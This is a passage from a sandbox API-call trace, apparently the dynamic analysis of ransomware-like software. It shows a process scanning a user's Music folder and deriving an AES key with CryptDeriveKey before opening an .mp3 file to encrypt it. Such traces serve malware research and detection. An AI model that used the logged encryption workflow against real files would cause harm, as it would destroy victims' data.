cchCount2=1) returned 3 [0188.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0188.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0188.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.162] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.162] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.162] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.162] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93ad500, ftCreationTime.dwHighDateTime=0x1d5e750, ftLastAccessTime.dwLowDateTime=0xa9281650, ftLastAccessTime.dwHighDateTime=0x1d5da16, ftLastWriteTime.dwLowDateTime=0xa9281650, ftLastWriteTime.dwHighDateTime=0x1d5da16, nFileSizeHigh=0x0, nFileSizeLow=0x14415, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RPbhRyzIp5Cjl.mp3", cAlternateFileName="RPBHRY~1.MP3")) returned 0x90add8 [0188.163] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0188.163] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.163] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93ad500, ftCreationTime.dwHighDateTime=0x1d5e750, ftLastAccessTime.dwLowDateTime=0xa9281650, ftLastAccessTime.dwHighDateTime=0x1d5da16, ftLastWriteTime.dwLowDateTime=0xa9281650, ftLastWriteTime.dwHighDateTime=0x1d5da16, nFileSizeHigh=0x0, nFileSizeLow=0x14415, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RPbhRyzIp5Cjl.mp3", cAlternateFileName="RPBHRY~1.MP3")) returned 0x90add8 [0188.163] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0188.164] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RPbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PbhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hRyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RyzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yzIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zIp5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ip5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5Cjl.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0188.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.166] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.166] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0188.166] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.166] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.166] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.166] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.166] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.166] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.166] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93ad500, ftCreationTime.dwHighDateTime=0x1d5e750, ftLastAccessTime.dwLowDateTime=0xa9281650, ftLastAccessTime.dwHighDateTime=0x1d5da16, ftLastWriteTime.dwLowDateTime=0xa9281650, ftLastWriteTime.dwHighDateTime=0x1d5da16, nFileSizeHigh=0x0, nFileSizeLow=0x14415, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="RPbhRyzIp5Cjl.mp3", cAlternateFileName="RPBHRY~1.MP3")) returned 0x90ae18 [0188.167] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0188.167] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.167] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.167] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0188.167] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0188.167] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.167] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.167] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0188.169] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0188.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.169] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0188.169] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.169] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.169] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.169] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0188.170] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0188.170] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.170] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.170] CryptHashData (hHash=0x90af58, pbData=0x8df140, dwDataLen=0x19, dwFlags=0x1) returned 1 [0188.170] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.170] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.170] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.170] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0188.170] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.170] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.171] CryptDestroyHash (hHash=0x90af58) returned 1 [0188.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0188.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0188.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0188.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0188.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0188.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0188.171] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rpbhryzip5cjl.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.172] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.172] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0188.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0188.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0188.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0188.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0188.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0188.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.172] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0188.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0188.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0188.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0188.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0188.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0188.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0188.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0188.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0188.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0188.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0188.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: 